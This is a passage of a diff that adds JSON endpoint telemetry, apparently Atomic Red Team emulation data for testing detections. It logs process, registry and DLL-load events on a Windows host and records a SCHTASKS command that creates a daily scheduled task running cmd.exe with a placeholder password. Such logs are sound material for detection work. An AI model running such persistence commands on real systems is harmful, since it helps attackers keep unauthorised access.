"C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573906980000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573906980000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "SCHTASKS.EXE-2DE769BF.pf", + "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573907300000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573938540000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573938700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573938700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573938700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573968550000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573968550000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_value": "{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn\\Index", + "registry_value": "Index", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Hash", + "registry_value": "Hash", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Schema", + "registry_value": "Schema", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Date", + "registry_value": "Date", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Author", + "registry_value": "Author", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\URI", + "registry_value": "URI", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Actions", + "registry_value": "Actions", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Triggers", + "registry_value": "Triggers", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "process", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "terminate", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "process", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6840, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573970860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "process", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573970890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7172, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "command_line": "SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2812, + "ppid": 7172, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "create", + "timestamp": 131883573971590000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", + "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "schtasks.exe", + "image_path": "C:\\Windows\\System32\\schtasks.exe", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "taskschd.dll", + "image_path": "C:\\Windows\\System32\\taskschd.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "msv1_0.dll", + "image_path": "C:\\Windows\\System32\\msv1_0.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "NtlmShared.dll", + "image_path": "C:\\Windows\\System32\\NtlmShared.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "process", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "terminate", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "file", + "file_name": "SCHTASKS.EXE-2DE769BF.pf", + "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2828, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573972110000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": 